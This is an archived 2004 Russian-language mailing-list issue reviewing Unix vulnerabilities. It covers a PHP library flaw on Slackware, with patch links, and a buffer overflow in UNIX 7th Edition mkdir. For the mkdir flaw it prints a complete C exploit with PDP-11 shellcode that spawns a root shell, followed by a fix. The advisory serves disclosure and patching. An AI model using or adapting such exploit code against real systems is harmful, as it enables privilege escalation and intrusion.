Отправляет email-рассылки с помощью сервиса Sendsay

UnixShell Daily

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "LinuxCenter News Channel: новости Linux" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

  Июнь 2004  
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Автор
linuxnarik

Статистика

39 подписчиков
-1 за неделю
  Все выпуски  

UnixShell Daily Обзор уязвимостей unix-систем на 5 июня


Информационный Канал Subscribe.Ru
Уязвимость в PHP на Slackware Linux системах 2004-06-05 
Программа: PHP
Описание:Уязвимость обнаружена в PHP на Slackware Linux. Локальный пользователь может аварийно завершить работу PHP или выполнить произвольный код.

Локальный пользователь может положить злонамеренную общедоступную библиотеку в небезопасное расположение. Затем, когда PHP откомпилирован, общедоступная библиотека будет встроена в PHP. В результате, PHP может аварийно завершить работу или выполнить произвольный код с привилегиями пользователя, запустившего PHP.
Опасность: Низкая
Эксплоит: Есть
Решение: Установите соответствующее обновление: 

Updated package for Slackware 8.1:

ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/php-4.3.6-i386-1.tgz



Updated package for Slackware 9.0:

ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/php-4.3.6-i386-1.tgz



Updated package for Slackware 9.1:

ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/php-4.3.6-i486-1.tgz



Updated package for Slackware -current:

ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/php-4.3.6-i486-4.tgz





The MD5 signatures are:



Slackware 8.1 package:

cee32e839211a37b0081615b4112b87f php-4.3.6-i386-1.tgz



Slackware 9.0 package:

eaa0c69981f0aa8cc6b2d4ef0269481c php-4.3.6-i386-1.tgz



Slackware 9.1 package:

007c48e42d292819b6cdc66e2e8334e0 php-4.3.6-i486-1.tgz



Slackware -current package:

07bcba5e37538f16941141c43006cec1 php-4.3.6-i486-4.tgz
#5
Источник: securitylab.ru

Переполнение буфера в mkdir утилите на UNIX 7th Edition системах 2004-06-05 
Программа: UNIX 7th Edition
Описание:Переполнение буфера обнаружено в mkdir утилите на UNIX 7th Edition системах. Локальный пользователь может получить root доступ на целевой системе.

/bin/mkdir ('/usr/src/cmd/mkdir.c') копирует части путей, представленных пользователем, в буфер фиксированного размера, когда проверяет существование определенной директории. Локальный пользователь может представить специально обработанное имя каталога, чтобы выполнить произвольный код на целевой системе с root привилегиями.

Эксплоит: 

/*

 * Exploit for /bin/mkdir Unix V7 PDP-11.

 * mkdir has a buffer overflow when checking if the directory

 * in /arg/with/slashes/fname exists.

 *

 * This will run /bin/sh with euid 0, but not uid 0.  Since

 * the shell doesn't do anything special about this, we don't

 * really care.  If you care, run  setuid(0); execl("/bin/sh", 0);

 */



/*

.globl  _main

_main:

    mov  pc,r1

    sub  $-[sh-_main-2], r1             / pointer to sh

    mov  r1, r2

    sub  $-8, r2

    clrb -1(r2)                         / null terminate

    mov  r1, r2

    clr  -(r1)                          / char *env[] = {0}

    mov  r1, r3

    mov  r2, -(r1)                      / char *argv[] = {sh, 0}

    mov  r1, r4

    mov  r3, -(r1)                      / reverse of sh,argv,env

    mov  r4, -(r1)

    mov  r2, -(r1)

    sys  59.; 11111; 11111; 11111       / call execve

argv:   11111; 11111

sh:     

*/



char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,

    0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,

    0102, 020, 041, 012, 0103, 020, 0241, 020,

    0104, 020, 0341, 020, 041, 021, 0241, 020,

    073, 0211, 0111, 022, 0111, 022, 0111, 022,

    0111, 022, 0111, 022, 057, 0142, 0151, 0156,

    057, 0163, 0150, 0 };



#define NOPSLIDE 50

#define CNT 136

#define PC 0xfea0



main(argc, argv)

    int argc;

    char **argv;

 

    char buf[400];

    int i;

    char *argv2[4];



    /* nop slide + egg */

    for(i = 0; i < NOPSLIDE; ) {

        buf[i++] = 0301;

        buf[i++] = 021;

    }

    strcpy(buf + i, egg);



    /* pad out to CNT */

    for(i = strlen(buf); i < CNT; i++)

        buf[i] = 'a';



    /* overwrite retaddr */

    buf[i++] = PC & 0xff;

    buf[i++] = PC >> 8;



    /* extra stuff */

    buf[i++] = '/';

    buf[i++] = 'a';

    buf[i++] = 0;



    argv2[0] = "/bin/mkdir";

    argv2[1] = buf;

    argv2[2] = 0;

    execv(argv2[0], argv2);

    return 0;

Опасность: Средняя
Эксплоит: Есть
Решение: Добавте следующий код в начало mkdir функции: 

if(strlen(d) >= 126) {

fprintf(stderr, "mkdir: path is too long\n");

++Errors;

return;

}
#4
Источник: securitylab.ru

http://subscribe.ru/
E-mail: ask@subscribe.ru 		Отписаться
Убрать рекламу

В избранное